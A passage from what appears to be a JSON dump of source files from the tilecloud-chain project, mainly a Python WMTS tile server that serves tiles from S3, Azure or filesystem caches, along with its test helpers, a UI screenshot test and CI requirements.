json_message.get(\"logger_name\", \"\").startswith(\"tilecloud\"):\n if \"full_message\" in json_message:\n full_message = json_message[\"full_message\"].replace(\"\\n\", \"<br />\")\n msg += f\"<br />{full_message}\"\n stdout_parsed.append(msg)\n except: # pylint: disable=bare-except\n stdout_parsed.append(line)\n return stdout_parsed\n\n\ndef _format_output(string: str, max_length: int = 1000) -> str:\n result = \"\"\n for line in string.splitlines():\n if len(string) > max_length:\n break\n if line.startswith(\"{\"):\n try:\n parsed = json.loads(line)\n if \"source_facility\" in parsed:\n if not parsed.startswith(\"tilecloud\"):\n continue\n\n if result:\n result += \"\\n\"\n\n if (\n \"level_name\" in parsed\n and \"source_facility\" in parsed\n and \"line\" in parsed\n and \"msg\" in parsed\n ):\n if parsed.startswith(\"tilecloud\"):\n result += (\n f\"[{parsed['level_name']}] {parsed['source_facility']}:{parsed['line']} \"\n f\"{parsed['msg']}\"\n )\n elif \"msg\" in parsed:\n result += parsed[\"msg\"]\n else:\n result += line\n except json.decoder.JSONDecodeError:\n if result:\n result += \"\\n\"\n result += line\n else:\n if result:\n result += \"\\n\"\n result += line\n\n if len(string) > max_length:\n return string[: max_length - 3] + \"\\n...\"\n return string\n\n\ndef _run_in_process(\n final_command: List[str],\n env: Dict[str, str],\n main: Callable[[List[str], IO[str]], Any],\n return_dict: Dict[str, Any],\n) -> None:\n display_command = shlex.join(final_command)\n error = False\n out = io.StringIO()\n try:\n for key, value in env.items():\n os.environ[key] = value\n _LOG.debug(\"Running the command `%s` using the function directly\", display_command)\n main(final_command, out)\n except Exception:\n _LOG.exception(\"Error while running the command `%s`\", display_command)\n error = True\n return_dict[\"out\"] = _format_output(\n \"<br />\".join(_parse_stdout(out.getvalue())),\n int(os.environ.get(\"TILECLOUD_CHAIN_MAX_OUTPUT_LENGTH\", 1000)),\n )\n return_dict[\"error\"] = error\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.7716049551963806, "avg_line_length": 31.399999618530273, "blob_id": "4da206b31014c505e13ba5d990a494a61881c725", "content_id": "4f628e0f33e1bcea619c7d6fb469ce2ca1eb0db4", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 162, "license_type": "permissive", "max_line_length": 47, "num_lines": 5, "path": "/ci/requirements.txt", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "c2cciutils[checks,publish]==1.5.8\npoetry-dynamic-versioning==0.25.0\npoetry-plugin-export==1.4.0\npoetry-plugin-tweak-dependencies-version==1.4.0\npre-commit==3.3.3\n" }, { "alpha_fraction": 0.5536445379257202, "alphanum_fraction": 0.5888615846633911, "avg_line_length": 28.780487060546875, "blob_id": "b51a653482b71cd89698b1a22ceddc77baabf063", "content_id": "ae95889e4554885fe81ef40d23e9a15e9bab6238", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1221, "license_type": "permissive", "max_line_length": 98, "num_lines": 41, "path": "/tilecloud_chain/tests/test_ui.py", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "import os\nimport subprocess\n\nimport pytest\nimport skimage.io\nfrom c2cwsgiutils.acceptance.image import check_image\n\nREGENERATE = False\n\n\ndef test_should_not_commit():\n assert REGENERATE is False\n\n\[email protected](\n \"url,expected_file_name,height,width\",\n [\n pytest.param(\"http://application:8080/admin/\", \"not-login\", 250, 800, id=\"not-login\"),\n pytest.param(\"http://application:8080/admin/test\", \"test\", 800, 800, id=\"test-not-login\"),\n pytest.param(\"http://app_test_user:8080/admin\", \"index\", 500, 1000, id=\"index\"),\n pytest.param(\"http://app_test_user:8080/admin/test\", \"test\", 800, 800, id=\"test\"),\n ],\n)\ndef test_ui(url, expected_file_name, height, width):\n subprocess.run(\n [\n \"node\",\n \"screenshot.js\",\n f\"--url={url}\",\n f\"--width={width}\",\n f\"--height={height}\",\n f\"--output=/tmp/{expected_file_name}.png\",\n ],\n check=True,\n )\n check_image(\n \"/results\",\n skimage.io.imread(f\"/tmp/{expected_file_name}.png\")[:, :, :3],\n os.path.join(os.path.dirname(__file__), f\"{expected_file_name}.expected.png\"),\n generate_expected_image=REGENERATE,\n )\n" }, { "alpha_fraction": 0.530263364315033, "alphanum_fraction": 0.5343995690345764, "avg_line_length": 33.21226501464844, "blob_id": "558126e6a779f569569aad38f47b51585b9b92cb", "content_id": "b1773e140d6e88c3177c81e8eafab742498a0507", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7253, "license_type": "permissive", "max_line_length": 109, "num_lines": 212, "path": "/tilecloud_chain/tests/__init__.py", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "import logging\nimport os\nimport re\nimport shutil\nimport sys\nimport traceback\nfrom io import StringIO\nfrom logging import config\nfrom typing import Any, Callable, List, Tuple, Union\nfrom unittest import TestCase\n\nimport yaml\n\nDIFF = 200\nlog = logging.getLogger(\"tests\")\n\nconfig.dictConfig(\n {\n \"version\": 1,\n \"loggers\": {\n \"default\": {\"level\": \"INFO\"},\n \"tilecloud\": {\"level\": \"DEBUG\"},\n \"tilecloud_chain\": {\"level\": \"DEBUG\"},\n },\n }\n)\n\n\nclass NoAliasDumper(yaml.SafeDumper):\n def ignore_aliases(self, data: Any) -> bool:\n return True\n\n\nclass CompareCase(TestCase):\n def assert_result_equals(self, result: str, expected: str, regex: bool = False) -> None:\n expected = expected.split(\"\\n\")\n result = re.sub(\"\\n[^\\n]*\\r\", \"\\n\", result)\n result = re.sub(\"^[^\\n]*\\r\", \"\", result)\n result = result.split(\"\\n\")\n for n, test in enumerate(zip(expected, result)):\n if test[0] != \"PASS...\":\n try:\n if regex:\n self.assertRegex(test[1].strip(), f\"^{test[0].strip()}$\")\n else:\n self.assertEqual(test[0].strip(), test[1].strip())\n except AssertionError as e:\n for i in range(max(0, n - DIFF), min(len(result), n + DIFF + 1)):\n if i == n:\n print(f\"> {i} {result[i]}\")\n log.info(f\"> {i} {result[i]}\")\n else:\n print(f\" {i} {result[i]}\")\n log.info(f\" {i} {result[i]}\")\n raise e\n self.assertEqual(len(expected), len(result), repr(result))\n\n def run_cmd(\n self, cmd: Union[List[str], str], main_func: Callable, get_error: bool = False\n ) -> Tuple[str, str]:\n old_stdout = sys.stdout\n sys.stdout = mystdout = StringIO()\n old_stderr = sys.stderr\n sys.stderr = mystderr = StringIO()\n try:\n self.assert_main_equals(cmd, main_func, [], get_error)\n except AssertionError:\n sys.stdout = old_stdout\n sys.stderr = old_stderr\n print(mystdout.getvalue())\n print(mystderr.getvalue())\n raise\n finally:\n sys.stdout = old_stdout\n sys.stderr = old_stderr\n log.info(mystdout.getvalue())\n log.info(mystderr.getvalue())\n return mystdout.getvalue(), mystderr.getvalue()\n\n def assert_cmd_equals(\n self, cmd: Union[List[str], str], main_func: Callable, empty_err: bool = False, **kargs: Any\n ) -> None:\n out, err = self.run_cmd(cmd, main_func)\n if empty_err:\n self.assertEqual(err, \"\")\n if isinstance(out, bytes):\n out = out.decode(\"utf-8\")\n else:\n out = str(out)\n self.assert_result_equals(result=out, **kargs)\n\n def assert_cmd_exit_equals(self, cmd: str, main_func: Callable) -> None:\n sys.argv = re.sub(\" +\", \" \", cmd).split(\" \")\n try:\n main_func()\n assert \"exit() not called.\"\n except SystemExit:\n pass\n\n def assert_main_equals(\n self,\n cmd: Union[List[str], str],\n main_func: Callable,\n expected: List[List[str]] = None,\n get_error: bool = False,\n **kargs: Any,\n ) -> None:\n if expected:\n for expect in expected:\n if os.path.exists(expect[0]):\n os.remove(expect[0])\n if type(cmd) == list:\n sys.argv = cmd\n else:\n sys.argv = re.sub(\" +\", \" \", cmd).split(\" \")\n try:\n main_func()\n assert get_error is False\n except SystemExit as e:\n if get_error:\n assert e.code not in (None, 0), str(e)\n else:\n assert e.code in (None, 0), str(e)\n except AssertionError:\n raise\n except Exception:\n if not get_error:\n log.exception(\"Unexpected error\")\n assert get_error is True, traceback.format_exc()\n\n if expected:\n for expect in expected:\n with open(expect[0]) as f:\n self.assert_result_equals(f.read(), expect[1], **kargs)\n\n def assert_main_except_equals(\n self, cmd: str, main_func: Callable, expected: List[List[str]], get_error: bool = False, **kargs: Any\n ) -> None:\n sys.argv = cmd.split(\" \")\n try:\n main_func()\n assert get_error is False\n except SystemExit as e:\n if get_error:\n assert e.code not in (None, 0), str(e)\n else:\n assert e.code in (None, 0), str(e)\n except AssertionError:\n raise\n except Exception:\n assert False, traceback.format_exc()\n\n if expected:\n for expect in expected:\n with open(expect[0]) as f:\n self.assert_result_equals(f.read(), expect[1], **kargs)\n\n def assert_yaml_equals(self, result: str, expected: str) -> None:\n expected = yaml.dump(\n yaml.safe_load(expected), width=120, default_flow_style=False, Dumper=NoAliasDumper\n )\n result = yaml.dump(yaml.safe_load(result), width=120, default_flow_style=False, Dumper=NoAliasDumper)\n self.assert_result_equals(result=result, expected=expected)\n\n def assert_cmd_yaml_equals(self, cmd: str, main_func: Callable, **kargs: Any) -> None:\n old_stdout = sys.stdout\n sys.stdout = mystdout = StringIO()\n self.assert_main_equals(cmd, main_func, [])\n sys.stdout = old_stdout\n self.assert_yaml_equals(result=mystdout.getvalue(), **kargs)\n\n def assert_tiles_generated(self, directory: str, **kargs: Any) -> None:\n if os.path.exists(directory):\n shutil.rmtree(directory, ignore_errors=True)\n\n self.assert_tiles_generated_deleted(directory=directory, **kargs)\n\n def assert_tiles_generated_deleted(\n self, directory: str, tiles_pattern: str, tiles: Any, expected: str = \"\", **kargs: Any\n ) -> None:\n self.assert_cmd_equals(expected=expected, **kargs)\n count = 0\n for path, dirs, files in os.walk(directory):\n if len(files) != 0:\n log.info((path, files))\n print((path, files))\n count += len(files)\n\n self.assertEqual(count, len(tiles))\n for tile in tiles:\n log.info(directory + tiles_pattern % tile)\n print(directory + tiles_pattern % tile)\n self.assertTrue(os.path.exists(directory + tiles_pattern % tile))\n\n def assert_files_generated(self, **kargs):\n self.assert_tiles_generated(tiles_pattern=\"%s\", **kargs)\n\n\nclass MatchRegex:\n \"\"\"Assert that a given string meets some expectations.\"\"\"\n\n def __init__(self, regex) -> None:\n self._regex = re.compile(regex)\n\n def __eq__(self, other: str) -> bool:\n return self._regex.match(other) is not None\n\n def match(self, other: str) -> re.Match:\n return self._regex.match(other)\n\n def __repr__(self):\n return self._regex.pattern\n" }, { "alpha_fraction": 0.8717948794364929, "alphanum_fraction": 0.8717948794364929, "avg_line_length": 38, "blob_id": "15889d07a67601d664cc5bef7a9d586af807ff8d", "content_id": "05da79d7bc5c1333095c4128cca67d3bdf19c5c8", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 39, "license_type": "permissive", "max_line_length": 38, "num_lines": 1, "path": "/.sonarcloud.properties", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "sonar.exclusions=tilecloud_chain/tests\n" }, { "alpha_fraction": 0.5351784229278564, "alphanum_fraction": 0.5422918796539307, "avg_line_length": 38.19074630737305, "blob_id": "5d4a998cc5ac252261f6553b305f4764e5344feb", "content_id": "7bf3c02aebda8635efaf67f937ea60d93ec5ad2e", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 34723, "license_type": "permissive", "max_line_length": 115, "num_lines": 886, "path": "/tilecloud_chain/server.py", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "# Copyright (c) 2013-2023 by Stéphane Brunner\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions\n# are met:\n# 1. Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# 2. Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# 3. Neither the name of Camptocamp nor the names of its contributors may\n# be used to endorse or promote products derived from this software\n# without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\n# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL <COPYRIGHT HOLDER> BE LIABLE FOR ANY\n# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\n# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nimport collections\nimport datetime\nimport json\nimport logging\nimport mimetypes\nimport os\nimport time\nfrom typing import TYPE_CHECKING, Any, Dict, Generic, List, Optional, TypeVar, Union, cast\nfrom urllib.parse import parse_qs, urlencode\n\nimport botocore.exceptions\nimport c2cwsgiutils.pyramid\nimport pyramid.response\nimport pyramid.session\nimport requests\nfrom azure.core.exceptions import ResourceNotFoundError\nfrom c2cwsgiutils import health_check\nfrom pyramid.config import Configurator\nfrom pyramid.httpexceptions import HTTPException, exception_response\nfrom pyramid.request import Request\nfrom pyramid.router import Router\nfrom pyramid_mako import add_mako_renderer\n\nimport tilecloud.store.s3\nimport tilecloud_chain.configuration\nimport tilecloud_chain.security\nfrom tilecloud import Tile, TileCoord\nfrom tilecloud_chain import TileGeneration, controller, internal_mapcache\nfrom tilecloud_chain.controller import get_azure_client\n\nlogger = logging.getLogger(__name__)\n\ntilegeneration = None\n\n\ndef init_tilegeneration(config_file: Optional[str]) -> None:\n \"\"\"Initialize the tile generation.\"\"\"\n global tilegeneration # pylint: disable=global-statement\n if tilegeneration is None:\n if config_file is not None:\n logger.info(\"Use config file: '%s'\", config_file)\n log_level = os.environ.get(\"TILE_SERVER_LOGLEVEL\")\n tilegeneration = TileGeneration(\n config_file,\n collections.namedtuple( # type: ignore\n \"Options\",\n [\"verbose\", \"debug\", \"quiet\", \"bbox\", \"zoom\", \"test\", \"near\", \"time\", \"geom\", \"ignore_error\"],\n )(\n log_level == \"verbose\", # type: ignore\n log_level == \"debug\",\n log_level == \"quiet\",\n None,\n None,\n None,\n None,\n None,\n True,\n False,\n ),\n configure_logging=False,\n multi_thread=False,\n maxconsecutive_errors=False,\n )\n\n\nResponse = TypeVar(\"Response\")\n\n\nclass DatedStore:\n \"\"\"Store with timestamp to be able to invalidate it on configuration change.\"\"\"\n\n def __init__(self, store: tilecloud.TileStore, mtime: float) -> None:\n \"\"\"Initialize.\"\"\"\n self.store = store\n self.mtime = mtime\n\n\nclass DatedFilter:\n \"\"\"Filter with timestamp to be able to invalidate it on configuration change.\"\"\"\n\n def __init__(self, layer_filter: Optional[tilecloud_chain.IntersectGeometryFilter], mtime: float) -> None:\n \"\"\"Initialize.\"\"\"\n self.filter = layer_filter\n self.mtime = mtime\n\n\nclass Server(Generic[Response]):\n \"\"\"The generic implementation of the WMTS server.\"\"\"\n\n def __init__(self) -> None:\n \"\"\"Initialize.\"\"\"\n try:\n self.filter_cache: Dict[str, Dict[str, DatedFilter]] = {}\n self.s3_client_cache: Dict[str, \"botocore.client.S3\"] = {}\n self.store_cache: Dict[str, Dict[str, DatedStore]] = {}\n\n assert tilegeneration\n\n self.wmts_path = tilegeneration.get_main_config().config[\"server\"][\"wmts_path\"]\n self.static_path = tilegeneration.get_main_config().config[\"server\"][\"static_path\"].split(\"/\")\n except Exception:\n logger.exception(\"Initialization error\")\n raise\n\n @staticmethod\n def get_expires_hours(config: tilecloud_chain.DatedConfig) -> float:\n \"\"\"Get the expiration time in hours.\"\"\"\n return config.config.get(\"server\", {}).get(\"expires\", tilecloud_chain.configuration.EXPIRES_DEFAULT)\n\n @staticmethod\n def get_static_allow_extension(config: tilecloud_chain.DatedConfig) -> List[str]:\n \"\"\"Get the allowed extensions in the static view.\"\"\"\n return config.config[\"server\"].get(\n \"static_allow_extension\", [\"jpeg\", \"png\", \"xml\", \"js\", \"html\", \"css\"]\n )\n\n @staticmethod\n def get_cache_name(config: tilecloud_chain.DatedConfig) -> str:\n \"\"\"Get the cache name.\"\"\"\n return config.config[\"server\"].get(\"cache\", config.config[\"generation\"][\"default_cache\"])\n\n def get_s3_client(self, config: tilecloud_chain.DatedConfig) -> \"botocore.client.S3\":\n \"\"\"Get the AWS S3 client.\"\"\"\n cache_s3 = cast(tilecloud_chain.configuration.CacheS3, self.get_cache(config))\n if cache_s3.get(\"host\", \"aws\") in self.s3_client_cache:\n return self.s3_client_cache[cache_s3.get(\"host\", \"aws\")]\n for n in range(10):\n try:\n client = tilecloud.store.s3.get_client(cache_s3.get(\"host\"))\n self.s3_client_cache[cast(str, cache_s3.get(\"host\", \"aws\"))] = client\n return client\n except KeyError as e:\n error = e\n time.sleep(n * 10)\n raise error\n\n def get_cache(self, config: tilecloud_chain.DatedConfig) -> tilecloud_chain.configuration.Cache:\n \"\"\"Get the cache from the config.\"\"\"\n return config.config[\"caches\"][self.get_cache_name(config)]\n\n @staticmethod\n def get_layers(config: tilecloud_chain.DatedConfig) -> List[str]:\n \"\"\"Get the layer from the config.\"\"\"\n layers: List[str] = cast(List[str], config.config[\"layers\"].keys())\n return config.config[\"server\"].get(\"layers\", layers)\n\n def get_filter(\n self, config: tilecloud_chain.DatedConfig, layer_name: str\n ) -> Optional[tilecloud_chain.IntersectGeometryFilter]:\n \"\"\"Get the filter from the config.\"\"\"\n dated_filter = self.filter_cache.get(config.file, {}).get(layer_name)\n\n if dated_filter is not None and dated_filter.mtime == config.mtime:\n return dated_filter.filter\n\n assert tilegeneration\n\n layer_filter = (\n tilecloud_chain.IntersectGeometryFilter(gene=tilegeneration)\n if config.config[\"server\"][\"geoms_redirect\"]\n else None\n )\n\n self.filter_cache.setdefault(config.file, {})[layer_name] = DatedFilter(layer_filter, config.mtime)\n return layer_filter\n\n def get_store(self, config: tilecloud_chain.DatedConfig, layer_name: str) -> tilecloud.TileStore:\n \"\"\"Get the store from the config.\"\"\"\n dated_store = self.store_cache.get(config.file, {}).get(layer_name)\n\n if dated_store is not None and dated_store.mtime == config.mtime:\n return dated_store.store\n\n assert tilegeneration\n\n store = tilegeneration.get_store(config, self.get_cache(config), layer_name, read_only=True)\n self.store_cache.setdefault(config.file, {})[layer_name] = DatedStore(store, config.mtime)\n return store\n\n @staticmethod\n def get_max_zoom_seed(config: tilecloud_chain.DatedConfig, layer_name: str) -> int:\n \"\"\"Get the max zoom to be bet in the stored cache.\"\"\"\n layer = config.config[\"layers\"][layer_name]\n if \"min_resolution_seed\" in layer:\n max_zoom_seed = -1\n for zoom, resolution in enumerate(config.config[\"grids\"][layer[\"grid\"]][\"resolutions\"]):\n if resolution > layer[\"min_resolution_seed\"]:\n max_zoom_seed = zoom\n return max_zoom_seed\n else:\n return 999999\n\n def _read(\n self,\n key_name: str,\n headers: Dict[str, str],\n config: tilecloud_chain.DatedConfig,\n **kwargs: Any,\n ) -> Response:\n cache = self.get_cache(config)\n try:\n cache_s3 = cast(tilecloud_chain.configuration.CacheS3, cache)\n bucket = cache_s3\n response = self.get_s3_client(config).get_object(Bucket=bucket, Key=key_name)\n body = response[\"Body\"]\n try:\n headers[\"Content-Type\"] = response.get(\"ContentType\")\n return self.response(config, body.read(), headers, **kwargs)\n finally:\n body.close()\n except botocore.exceptions.ClientError as ex:\n if ex.response[\"Error\"][\"Code\"] == \"NoSuchKey\":\n return self.error(config, 404, key_name + \" not found\")\n else:\n raise\n\n def _get(\n self,\n path: str,\n headers: Dict[str, str],\n config: tilecloud_chain.DatedConfig,\n **kwargs: Any,\n ) -> Response:\n \"\"\"Get capabilities or other static files.\"\"\"\n assert tilegeneration\n cache = self.get_cache(config)\n\n if cache[\"type\"] == \"s3\":\n cache_s3 = cast(tilecloud_chain.configuration.CacheS3, cache)\n key_name = os.path.join(cache_s3[\"folder\"], path)\n try:\n return self._read(key_name, headers, config, **kwargs)\n except Exception:\n del self.s3_client_cache[cache_s3.get(\"host\", \"aws\")]\n return self._read(key_name, headers, config, **kwargs)\n if cache[\"type\"] == \"azure\":\n cache_azure = cast(tilecloud_chain.configuration.CacheAzure, cache)\n key_name = os.path.join(cache_azure[\"folder\"], path)\n try:\n blob = get_azure_client().get_blob_client(container=cache_azure[\"container\"], blob=key_name)\n properties = blob.get_blob_properties()\n data = blob.download_blob().readall()\n return self.response(\n config,\n data if isinstance(data, bytes) else data.encode(\"utf-8\"), # type: ignore\n {\n \"Content-Encoding\": cast(str, properties.content_settings.content_encoding),\n \"Content-Type\": cast(str, properties.content_settings.content_type),\n },\n **kwargs,\n )\n except ResourceNotFoundError:\n return self.error(config, 404, path + \" not found\", **kwargs)\n else:\n cache_filesystem = cast(tilecloud_chain.configuration.CacheFilesystem, cache)\n folder = cache_filesystem[\"folder\"] or \"\"\n if path.split(\".\")[-1] not in self.get_static_allow_extension(config):\n return self.error(config, 403, \"Extension not allowed\", **kwargs)\n p = os.path.join(folder, path)\n if not os.path.isfile(p):\n return self.error(config, 404, path + \" not found\", **kwargs)\n with open(p, \"rb\") as file:\n data = file.read()\n content_type = mimetypes.guess_type(p)[0]\n if content_type:\n headers[\"Content-Type\"] = content_type\n return self.response(config, data, headers, **kwargs)\n\n def __call__(\n self,\n config: tilecloud_chain.DatedConfig,\n config_file: str,\n environ: Dict[str, str],\n start_response: bytes,\n ) -> Response:\n \"\"\"Build the response on request.\"\"\"\n params = {}\n for key, value in parse_qs(environ[\"QUERY_STRING\"], True).items():\n params[key.upper()] = value[0]\n\n path = None if len(params) > 0 else environ[\"PATH_INFO\"][1:].split(\"/\")\n\n return self.serve(path, params, config=config, config_file=config_file, start_response=start_response)\n\n def serve(\n self,\n path: Optional[List[str]],\n params: Dict[str, str],\n config: tilecloud_chain.DatedConfig,\n **kwargs: Any,\n ) -> Response:\n \"\"\"Serve the WMTS requests.\"\"\"\n\n if not config or not config.config:\n return self.error(\n config,\n 404,\n \"No configuration file found for the host or the configuration has an error, see logs for details\",\n **kwargs,\n )\n\n try:\n dimensions = []\n metadata = {}\n assert tilegeneration\n\n if path:\n if tuple(path[: len(self.static_path)]) == tuple(self.static_path):\n return self._get(\n \"/\".join(path[len(self.static_path) :]),\n {\n \"Expires\": (\n datetime.datetime.utcnow()\n + datetime.timedelta(hours=self.get_expires_hours(config))\n ).isoformat(),\n \"Cache-Control\": f\"max-age={3600 * self.get_expires_hours(config)}\",\n \"Access-Control-Allow-Origin\": \"*\",\n \"Access-Control-Allow-Methods\": \"GET\",\n },\n config=config,\n **kwargs,\n )\n elif len(path) >= 1 and path[0] != self.wmts_path:\n return self.error(\n config,\n 404,\n f\"Type '{path[0]}' don't exists, allows values: '{self.wmts_path}' or \"\n f\"'{'/'.join(self.static_path)}'\",\n **kwargs,\n )\n path = path[1:] # remove type\n\n if path:\n if len(path) == 2 and path[0] == \"1.0.0\" and path[1].lower() == \"wmtscapabilities.xml\":\n params[\"SERVICE\"] = \"WMTS\"\n params[\"VERSION\"] = \"1.0.0\"\n params[\"REQUEST\"] = \"GetCapabilities\"\n elif len(path) < 7:\n return self.error(config, 400, \"Not enough path\", **kwargs)\n else:\n params[\"SERVICE\"] = \"WMTS\"\n params[\"VERSION\"] = path[0]\n\n params[\"LAYER\"] = path[1]\n params[\"STYLE\"] = path[2]\n\n if params[\"LAYER\"] in self.get_layers(config):\n layer = cast(\n tilecloud_chain.configuration.LayerWms,\n config.config[\"layers\"][params[\"LAYER\"]],\n )\n else:\n return self.error(config, 400, f\"Wrong Layer '{params['LAYER']}'\", **kwargs)\n\n index = 3\n dimensions = path[index : index + len(layer.get(\"dimensions\", {}))]\n for dimension in layer.get(\"dimensions\", {}):\n metadata[\"dimension_\" + dimension[\"name\"]] = path[index]\n params[dimension[\"name\"].upper()] = path[index]\n index += 1\n\n last = path[-1].split(\".\")\n if len(path) < index + 4:\n return self.error(config, 400, \"Not enough path\", **kwargs)\n params[\"TILEMATRIXSET\"] = path[index]\n params[\"TILEMATRIX\"] = path[index + 1]\n params[\"TILEROW\"] = path[index + 2]\n if len(path) == index + 4:\n params[\"REQUEST\"] = \"GetTile\"\n params[\"TILECOL\"] = last[0]\n if last[1] != layer[\"extension\"]:\n return self.error(config, 400, f\"Wrong extension '{last[1]}'\", **kwargs)\n elif len(path) == index + 6:\n params[\"REQUEST\"] = \"GetFeatureInfo\"\n params[\"TILECOL\"] = path[index + 3]\n params[\"I\"] = path[index + 4]\n params[\"J\"] = last[0]\n params[\"INFO_FORMAT\"] = layer.get(\"info_formats\", [\"application/vnd.ogc.gml\"])[0]\n else:\n return self.error(config, 400, \"Wrong path length\", **kwargs)\n\n params[\"FORMAT\"] = layer[\"mime_type\"]\n else:\n if \"SERVICE\" not in params or \"REQUEST\" not in params or \"VERSION\" not in params:\n return self.error(config, 400, \"Not all required parameters are present\", **kwargs)\n\n if params[\"SERVICE\"] != \"WMTS\":\n return self.error(config, 400, f\"Wrong Service '{params['SERVICE']}'\", **kwargs)\n if params[\"VERSION\"] != \"1.0.0\":\n return self.error(config, 400, f\"Wrong Version '{params['VERSION']}'\", **kwargs)\n\n if params[\"REQUEST\"] == \"GetCapabilities\":\n headers = {\n \"Content-Type\": \"application/xml\",\n \"Expires\": (\n datetime.datetime.utcnow() + datetime.timedelta(hours=self.get_expires_hours(config))\n ).isoformat(),\n \"Cache-Control\": f\"max-age={3600 * self.get_expires_hours(config)}\",\n \"Access-Control-Allow-Origin\": \"*\",\n \"Access-Control-Allow-Methods\": \"GET\",\n }\n cache = self.get_cache(config)\n if \"wmtscapabilities_file\" in cache:\n wmtscapabilities_file = cache[\"wmtscapabilities_file\"]\n return self._get(wmtscapabilities_file, headers, config=config, **kwargs)\n else:\n body = controller.get_wmts_capabilities(\n tilegeneration, self.get_cache_name(config), config=config\n )\n assert body\n headers[\"Content-Type\"] = \"application/xml\"\n return self.response(config, body.encode(\"utf-8\"), headers=headers, **kwargs)\n\n if (\n \"FORMAT\" not in params\n or \"LAYER\" not in params\n or \"TILEMATRIXSET\" not in params\n or \"TILEMATRIX\" not in params\n or \"TILEROW\" not in params\n or \"TILECOL\" not in params\n ):\n return self.error(config, 400, \"Not all required parameters are present\", **kwargs)\n\n if not path:\n if params[\"LAYER\"] in self.get_layers(config):\n layer = cast(\n tilecloud_chain.configuration.LayerWms,\n config.config[\"layers\"][params[\"LAYER\"]],\n )\n else:\n return self.error(config, 400, f\"Wrong Layer '{params['LAYER']}'\", **kwargs)\n\n for dimension in layer.get(\"dimensions\", []):\n value = (\n params[dimension[\"name\"].upper()]\n if dimension[\"name\"].upper() in params\n else dimension[\"default\"]\n )\n dimensions.append(value)\n metadata[\"dimension_\" + dimension[\"name\"]] = value\n\n if params[\"STYLE\"] != layer[\"wmts_style\"]:\n return self.error(config, 400, f\"Wrong Style '{params['STYLE']}'\", **kwargs)\n if params[\"TILEMATRIXSET\"] != layer[\"grid\"]:\n return self.error(config, 400, f\"Wrong TileMatrixSet '{params['TILEMATRIXSET']}'\", **kwargs)\n\n metadata[\"layer\"] = params[\"LAYER\"]\n metadata[\"config_file\"] = config.file\n tile = Tile(\n TileCoord(\n # TODO fix for matrix_identifier = resolution\n int(params[\"TILEMATRIX\"]),\n int(params[\"TILECOL\"]),\n int(params[\"TILEROW\"]),\n ),\n metadata=metadata,\n )\n\n if params[\"REQUEST\"] == \"GetFeatureInfo\":\n if \"I\" not in params or \"J\" not in params or \"INFO_FORMAT\" not in params:\n return self.error(config, 400, \"Not all required parameters are present\", **kwargs)\n if \"query_layers\" in layer:\n return self.forward(\n config,\n layer[\"url\"]\n + \"?\"\n + urlencode(\n {\n \"SERVICE\": \"WMS\",\n \"VERSION\": layer.get(\"version\", \"1.1.1\"),\n \"REQUEST\": \"GetFeatureInfo\",\n \"LAYERS\": layer[\"layers\"],\n \"QUERY_LAYERS\": layer[\"query_layers\"],\n \"STYLES\": params[\"STYLE\"],\n \"FORMAT\": params[\"FORMAT\"],\n \"INFO_FORMAT\": params[\"INFO_FORMAT\"],\n \"WIDTH\": config.config[\"grids\"][layer[\"grid\"]][\"tile_size\"],\n \"HEIGHT\": config.config[\"grids\"][layer[\"grid\"]][\"tile_size\"],\n \"SRS\": config.config[\"grids\"][layer[\"grid\"]][\"srs\"],\n \"BBOX\": tilegeneration.get_grid(config, layer[\"grid\"]).extent(tile.tilecoord),\n \"X\": params[\"I\"],\n \"Y\": params[\"J\"],\n }\n ),\n no_cache=True,\n **kwargs,\n )\n else:\n return self.error(config, 400, f\"Layer '{params['LAYER']}' not queryable\", **kwargs)\n\n if params[\"REQUEST\"] != \"GetTile\":\n return self.error(config, 400, f\"Wrong Request '{params['REQUEST']}'\", **kwargs)\n\n if params[\"FORMAT\"] != layer[\"mime_type\"]:\n return self.error(config, 400, f\"Wrong Format '{params['FORMAT']}'\", **kwargs)\n\n if tile.tilecoord.z > self.get_max_zoom_seed(config, params[\"LAYER\"]):\n return self._map_cache(config, layer, tile, kwargs)\n\n layer_filter = self.get_filter(config, params[\"LAYER\"])\n if layer_filter:\n meta_size = layer[\"meta_size\"]\n meta_tilecoord = (\n TileCoord(\n # TODO fix for matrix_identifier = resolution\n tile.tilecoord.z,\n round(tile.tilecoord.x / meta_size * meta_size),\n 